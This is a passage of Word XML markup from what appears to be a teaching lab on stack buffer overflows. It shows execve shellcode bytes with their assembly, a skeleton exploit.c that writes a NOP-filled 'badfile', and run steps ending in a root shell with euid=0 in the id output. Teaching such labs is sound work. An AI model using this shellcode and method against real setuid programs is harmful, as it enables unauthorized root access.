              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x89\xe1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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movl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>%esp,%ecx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\x99"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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cdq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="242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spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\xb0\x0b"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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movb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x0b,%al</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="270" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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</w:tcPr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z w:val="22"/>
              </w:rPr>
              <w:t>"\xcd\x80"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="62"/>
              <w:jc w:val="righ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position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="916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2421" w:type="dxa"/>
          </w:tcPr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sz w:val="22"/>
              </w:rPr>
              <w:t>$0x80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:ind w:right="44"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:position w:val="-3"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="230" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="377" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="211" w:lineRule="exact"/>
              <w:ind w:left="50"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:w w:val="99"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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42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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto" w:before="107"/>
        <w:ind w:left="159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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>main(int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argc,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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>argv)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="241" w:lineRule="exact"/>
        <w:ind w:left="159"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="683" w:right="7048"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char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buffer[517];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:ind w:left="683" w:right="7048"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>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badfile;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="225" w:lineRule="auto"/>
        <w:ind w:left="683" w:right="2596"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-11"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Initialize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buffer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with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0x90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(NOP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instruction)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>memset(&amp;buffer,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0x90,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517);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="683"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>need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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>fill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buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>appropriate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contents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here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="270" w:lineRule="exact" w:before="61"/>
        <w:ind w:left="683" w:right="3373"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Save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contents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file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"badfile"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>badfile = fopen("./badfile", "w");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fwrite(buffer, 517, 1, badfile);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fclose(badfile);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="159"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="99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line="247" w:lineRule="auto" w:before="216"/>
        <w:ind w:left="159" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After you finish the above program, compile and run it. This will generate the contents for “badfile”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Then run the vulnerable program </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. If your exploit is implemented correctly, you should be able to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>get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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell: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56" w:lineRule="auto"/>
        <w:ind w:left="159" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Please compile your vulnerable program first. Please note that the program exploit.c, which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>generates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bad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>file,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compiled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default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enabled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53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going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overflow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buffer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program.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="14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overflowing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buffer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stack.c,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53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compiled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Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="195"/>
        <w:ind w:left="421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8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>exploit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exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="2778" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="21"/>
        <w:ind w:left="421"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>$./exploit</w:t>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>create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badfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="2778" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="261" w:lineRule="auto" w:before="22"/>
        <w:ind w:left="421" w:right="110"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>$./stack</w:t>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t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9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-129"/>
        </w:rPr>
        <w:t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&lt;----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Bingo!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You’ve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got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a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root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shell!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="148"/>
        <w:ind w:left="159" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It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noted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“#”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prompt,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real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/>
        <w:t>id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still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>yourself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53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id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root).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10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check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typing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following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="145"/>
        <w:ind w:left="42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id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="421"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>uid=(500)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euid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="1280" w:right="1000"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="96"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Many commands will behave differently if they are executed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Set-UID root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>processes, instead of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>just</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-40"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>processes,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>they</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>recognize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
